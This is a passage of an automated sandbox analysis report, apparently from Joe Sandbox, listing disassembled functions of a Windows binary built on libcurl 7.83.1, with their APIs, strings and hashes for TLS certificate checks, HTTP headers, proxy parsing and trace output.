                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$_strdup$free$___from_strstr_to_strchrfclosefopenmalloc
                                    • String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$f
                                    • API String ID: 288693899-3884612863
                                    • Opcode ID: 82c2d0f972c45a2eb11a6e76b057fe589bb1e16f04496fd692be0e02661f252f
                                    • Instruction ID: 6a62de03bc4c155e13da910248e871c02a121757d0db87054f949343fe8dc656
                                    • Opcode Fuzzy Hash: 82c2d0f972c45a2eb11a6e76b057fe589bb1e16f04496fd692be0e02661f252f
                                    • Instruction Fuzzy Hash: D5C1E3752087418FC719DF3898A466BBBF1AFC9319F14691DF4CAB7282DB31D8868B11
                                    Function 00E4F363 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 340encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 00E4F4D6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F4E7
                                    • CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 00E4F5D8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F5E3
                                    • CertGetCertificateChain.CRYPT32(?,?,00000000,?,00000010,00000000,00000000,?), ref: 00E4F698
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4F6A3
                                    • CertFreeCertificateChainEngine.CRYPT32(00000000), ref: 00E4F7C1
                                    • CertCloseStore.CRYPT32(?,00000000), ref: 00E4F7D4
                                    • CertFreeCertificateChain.CRYPT32(00000000), ref: 00E4F7E9
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E4F7FE
                                    Strings
                                    • schannel: failed to create certificate chain engine: %s, xrefs: 00E4F5F8
                                    • schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 00E4F739
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00E4F6F6
                                    • (memory blob), xrefs: 00E4F540
                                    • schannel: Failed to read remote certificate context: %s, xrefs: 00E4F7A4
                                    • schannel: failed to create certificate store: %s, xrefs: 00E4F4FC
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00E4F729
                                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00E4F4B8
                                    • schannel: CertGetCertificateChain failed: %s, xrefs: 00E4F6B8
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00E4F71D
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00E4F711
                                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00E4F705
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Cert$Certificate$Chain$ErrorFreeLast$EngineStore$CloseContextCreateOpen
                                    • String ID: (memory blob)$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                    • API String ID: 713146188-3435997996
                                    • Opcode ID: 9fadc3648e6b0463d88dabb52edc2389a0eec4c3de8ffd0241c6343655f589d2
                                    • Instruction ID: 7a99e6c5eae230edec01e421f61c8c78f7ec7af3c245621f7186a6d7fa62c68d
                                    • Opcode Fuzzy Hash: 9fadc3648e6b0463d88dabb52edc2389a0eec4c3de8ffd0241c6343655f589d2
                                    • Instruction Fuzzy Hash: 82D1BE71A00314DFDB298F24EC89BEA73F5AB44B15F1411BAE919BB291DB749D80CF90
                                    Function 00E430C0 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 261COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43177
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431BB
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431CC
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E431E0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4324F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E43278
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4328B
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4329F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E432B3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E43337
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$free
                                    • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.83.1%sQUIT$CLIENT libcurl 7.83.1DEFINE %s %sQUIT$CLIENT libcurl 7.83.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                    • API String ID: 3654317688-2903917456
                                    • Opcode ID: daef195c9367835794db81067ee4969cbad8576c2bb4397d48b61fef01f55b3a
                                    • Instruction ID: 5671930d7766e0369bc9d56f0e83103b8c4ad6f3c67624756cbdc5bfad3e7eb4
                                    • Opcode Fuzzy Hash: daef195c9367835794db81067ee4969cbad8576c2bb4397d48b61fef01f55b3a
                                    • Instruction Fuzzy Hash: F6713D316483421AE7255638BC43B2B3BD9DFD27B8F24345DF855BB2D2EE618E048356
                                    Function 00E44585 Relevance: 37.2, APIs: 7, Strings: 14, Instructions: 415libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 00E4463C
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E44643
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E447FA
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E44823
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E4483C
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4497C
                                    Strings
                                    • ntdll, xrefs: 00E44637
                                    • Failed to set SNI, xrefs: 00E447E5
                                    • http, xrefs: 00E44875
                                    • schannel: SNI or certificate check failed: %s, xrefs: 00E44A52
                                    • schannel: using IP address, SNI is not supported by OS., xrefs: 00E44846
                                    • wine_get_version, xrefs: 00E44632
                                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00E44B1F
                                    • schannel: unable to allocate memory, xrefs: 00E4498F
                                    • http/1.1, xrefs: 00E44859
                                    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00E44A38, 00E44A6F
                                    • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 00E4461C
                                    • /1.1, xrefs: 00E4487F
                                    • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00E44B07
                                    • ALPN: offers %s, xrefs: 00E4485E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_pton$AddressHandleModuleProc_strdupcalloc
                                    • String ID: /1.1$ALPN: offers %s$Failed to set SNI$http$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                    • API String ID: 1589778587-246979986
                                    • Opcode ID: ae0d1b20c335de5075fe8db5babdf546326f7adc0bb700913aadc4ef916c5d11
                                    • Instruction ID: effc8ae3b7517f88d31fcddd27853bc969cc54a17635d7aae3e4e93344351a47
                                    • Opcode Fuzzy Hash: ae0d1b20c335de5075fe8db5babdf546326f7adc0bb700913aadc4ef916c5d11
                                    • Instruction Fuzzy Hash: B5F1CAB0B042149FEB288F14EC85BE977B4EF46315F1450EAE849BA2D2EB709D84CF51
                                    Function 00E01070 Relevance: 37.1, APIs: 9, Strings: 12, Instructions: 313fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E0115C
                                      • Part of subcall function 00E1027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                      • Part of subcall function 00E1027A: __alldvrm.LIBCMT ref: 00E102A7
                                      • Part of subcall function 00E1027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E010C7
                                    • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 00E01116
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E56C58), ref: 00E0117D
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00E01210
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E01221
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000001,?), ref: 00E012D3
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,?), ref: 00E01321
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E01361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfwrite$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_localtime64_time64fopen
                                    • String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]$|l
                                    • API String ID: 4066690675-4117931577
                                    • Opcode ID: e0faece119a2f9489b2a6309eb91996d359a1965319dce3af68428f4a658e8fc
                                    • Instruction ID: 61a8ae817dc8f3404f2f835325bd4fc01c9e02434766766f8d42c04c554c21f6
                                    • Opcode Fuzzy Hash: e0faece119a2f9489b2a6309eb91996d359a1965319dce3af68428f4a658e8fc
                                    • Instruction Fuzzy Hash: 3AB12371E04205AFCB14CFB9DC44AEEBBB4FB09348F0465A8E554BB690C771AC85CB90
                                    Function 00E3FA70 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 321networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3FAC5
                                    • WSACreateEvent.WS2_32 ref: 00E3FB36
                                    • WSAGetLastError.WS2_32 ref: 00E3FB46
                                    • WSAEventSelect.WS2_32(?,00000000,00000021), ref: 00E3FB69
                                    • WSACloseEvent.WS2_32(00000000), ref: 00E3FB75
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00E3FB84
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00E3FB97
                                    • WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1(00000001,?,00000000,00000064), ref: 00E3FBD6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Event$CloseCreateErrorFileHandleLastMultipleObjectsSelectTypeWaitcalloc
                                    • String ID: $Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                                    • API String ID: 2419709179-2457143120
                                    • Opcode ID: f05ebcc50eb08d0e9539caf37c09f86b9ec12564f1c8d4e1bfe35ef3ae37fc41
                                    • Instruction ID: 1331d73f4c316eadbd3603ef38b0173e041c0bcce51cf983723db4e44c4eeb36
                                    • Opcode Fuzzy Hash: f05ebcc50eb08d0e9539caf37c09f86b9ec12564f1c8d4e1bfe35ef3ae37fc41
                                    • Instruction Fuzzy Hash: 18B1AF729083009FD714CF25D84CBAABBE9AF84714F14193DF949EB291D7719C45CBA2
                                    Function 00E278C7 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 282filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sha256//,00000008), ref: 00E27907
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27936
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27994
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E27AA3
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 00E27ABA
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E27ACE
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 00E27ADF
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27B16
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E27B2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27BB6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27BC8
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E27BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fseekmalloc$fclosefopenfreadftellstrncmp
                                    • String ID: public key hash: sha256//%s$;sha256//$sha256//$xk
                                    • API String ID: 477934247-1509790568
                                    • Opcode ID: cf625f8e31969f46fb57336aed3aca1db981821f91d75fa58704d9dfccdc1e5e
                                    • Instruction ID: a6b8c2bcab6936865a8e02b36997d20a56bca1fdcbd0a09e3d665534f0ddd5e0
                                    • Opcode Fuzzy Hash: cf625f8e31969f46fb57336aed3aca1db981821f91d75fa58704d9dfccdc1e5e
                                    • Instruction Fuzzy Hash: 3D912732E08629EFCF159F65FC18AAE7BB6EF44365F24446AE845B3250DB705E04CB90
                                    Function 00E01FDC Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 198filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E02082
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E020CA
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E020DD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,out of memory,?,?,?,?,?,00E0184E), ref: 00E020F9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E0184E), ref: 00E0211F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E0184E), ref: 00E0212A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0216F
                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,00E57138,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E0219C
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E021AE
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57138,?,?,00000000,?,?,?,?,?,?,00E0184E), ref: 00E021BC
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00E0184E), ref: 00E021CB
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,00E0184E), ref: 00E021D3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,Failed to open the file %s: %s,?,00000000,?,?,?,00E0184E), ref: 00E021EA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00E0184E), ref: 00E021F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$free$_close_fdopenfopenmallocstrerror
                                    • String ID: %s/%s$0kv@qv@/lv$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
                                    • API String ID: 2640482070-666277260
                                    • Opcode ID: bd6c0427d7cb50c6625306904b1013e88128ce3fe8f83e5d591f0c173ca9c1cc
                                    • Instruction ID: a5568eb57d15de9d960658465c26c0f11df8aff3017c336d467b08777fd587a5
                                    • Opcode Fuzzy Hash: bd6c0427d7cb50c6625306904b1013e88128ce3fe8f83e5d591f0c173ca9c1cc
                                    • Instruction Fuzzy Hash: A1613371904705AFCB109FA4EC498AEBBF4FF18315F20992DEA45B72A1D7718988CB50
                                    Function 00E32F70 Relevance: 35.0, APIs: 8, Strings: 15, Instructions: 460COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32FFA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33075
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33098
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33105
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33147
                                      • Part of subcall function 00E32B7A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32BB8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E33386
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E333A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E333BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
                                    • API String ID: 1294909896-3403769770
                                    • Opcode ID: 5ec319fcbcaadf490e9f718b8b01090d5478b72088b7c8daaa295952e20129b4
                                    • Instruction ID: ea2ed96bccc85ed49c9bb57a638d48024456a8b8e93b95eef2858a17625fb153
                                    • Opcode Fuzzy Hash: 5ec319fcbcaadf490e9f718b8b01090d5478b72088b7c8daaa295952e20129b4
                                    • Instruction Fuzzy Hash: DC02B331704702AFDB19DB38D858B6ABBE1FF84364F14562EE858A7291DB30AD54CB81
                                    Function 00E23C44 Relevance: 33.6, APIs: 8, Strings: 11, Instructions: 335COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E15D67: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E0A827,?,?,00000000), ref: 00E15D7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24013
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24025
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24039
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc
                                    • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h$xk
                                    • API String ID: 3095843317-3687139825
                                    • Opcode ID: 5f11da7bcbcdf33be068ccb03a221068ac9dd7a476fec2fe99b0dd8d768fa3ca
                                    • Instruction ID: e3efe6ff23f8ec09d479c5c90dd22f96d39daca0f995faa40423b4aeb5d8d347
                                    • Opcode Fuzzy Hash: 5f11da7bcbcdf33be068ccb03a221068ac9dd7a476fec2fe99b0dd8d768fa3ca
                                    • Instruction Fuzzy Hash: D2C1F271F00229DBDB149F68E8417EEB7F6EF84314F14902AE905BB291DB789E458F60
                                    Function 00E216CA Relevance: 32.8, APIs: 26, Instructions: 280COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E21740
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00E08BF9), ref: 00E21765
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E08BF9), ref: 00E21782
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E08BF9), ref: 00E217A6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E217CB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E217F5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2181D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21876
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21893
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E218B0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E218EF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2190C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21929
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21946
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21963
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21980
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2199D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219BA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219D7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E219F4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A11
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A2E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A4B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21A68
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21AE2
                                      • Part of subcall function 00E1D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1D13A
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E03167), ref: 00E10E2C
                                      • Part of subcall function 00E10E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10E41
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21AB8
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
